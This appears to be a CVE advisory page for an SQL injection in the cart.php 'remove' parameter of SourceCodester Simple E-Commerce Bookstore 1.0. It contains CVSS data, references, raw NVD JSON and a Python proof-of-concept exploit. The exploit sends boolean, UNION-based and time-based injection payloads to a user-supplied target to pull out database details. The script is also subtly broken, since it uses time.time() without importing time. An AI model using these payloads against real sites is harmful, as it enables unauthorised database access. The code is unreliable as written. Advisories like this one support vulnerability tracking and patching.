CVE-2025-11430

Description

A vulnerability was found in SourceCodester Simple E-Commerce Bookstore 1.0. The affected element is an unknown function of the file /cart.php. The manipulation of the argument remove results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:janobe:simple_e-commerce_bookstore:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Simple E-Commerce Bookstore 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11430 PoC - SQL Injection in /cart.php via 'remove' parameter
# Target: SourceCodester Simple E-Commerce Bookstore 1.0
# Vulnerability: SQL Injection

import requests
import sys

TARGET_URL = "http://target.com/cart.php"

def check_sql_injection(target_url):
    """Check if the target is vulnerable to SQL injection via 'remove' parameter"""
    # Normal request
    normal_payload = {"remove": "1"}
    normal_response = requests.get(target_url, params=normal_payload)
    normal_length = len(normal_response.text)

    # Boolean-based SQL injection test payload
    true_payload = {"remove": "1' AND '1'='1"}
    false_payload = {"remove": "1' AND '1'='2"}

    true_response = requests.get(target_url, params=true_payload)
    false_response = requests.get(target_url, params=false_payload)

    if len(true_response.text) != len(false_response.text):
        print("[+] Target is vulnerable to SQL injection!")
        return True
    else:
        print("[-] Target does not appear to be vulnerable.")
        return False

def exploit_sql_injection(target_url):
    """Exploit SQL injection to extract database information"""
    # Extract database version using UNION-based injection
    payload = {
        "remove": "1' UNION SELECT 1,version(),database(),user(),5-- -"
    }
    response = requests.get(target_url, params=payload)
    print(f"[+] Database info from response:\n{response.text}")

    # Time-based blind SQL injection to confirm
    time_payload = {"remove": "1' AND SLEEP(5)-- -"}
    start_time = time.time()
    requests.get(target_url, params=time_payload)
    elapsed = time.time() - start_time

    if elapsed >= 5:
        print(f"[+] Time-based injection confirmed (delay: {elapsed:.2f}s)")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    if check_sql_injection(TARGET_URL):
        exploit_sql_injection(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11430
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11430
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11430/
[4] VulDB https://vuldb.com/cve/CVE-2025-11430
[5] https://github.com/DrNbnonono/CVE/issues/2
[6] https://vuldb.com/?ctiid.327367
[7] https://vuldb.com/?id.327367
[8] https://vuldb.com/?submit.666275
[9] https://www.sourcecodester.com/
[10] https://github.com/DrNbnonono/CVE/issues/2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11430", "sourceIdentifier": "[email protected]", "published": "2025-10-08T04:16:16.200", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in SourceCodester Simple E-Commerce Bookstore 1.0. The affected element is an unknown function of the file /cart.php. The manipulation of the argument remove results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:janobe:simple_e-commerce_bookstore:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AABB3C47-CA30-441C-926D-ED112DEEEB5E"}]}]}], "references": [{"url": "https://github.com/DrNbnonono/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327367", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327367", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.666275", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/DrNbnonono/CVE/issues/2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}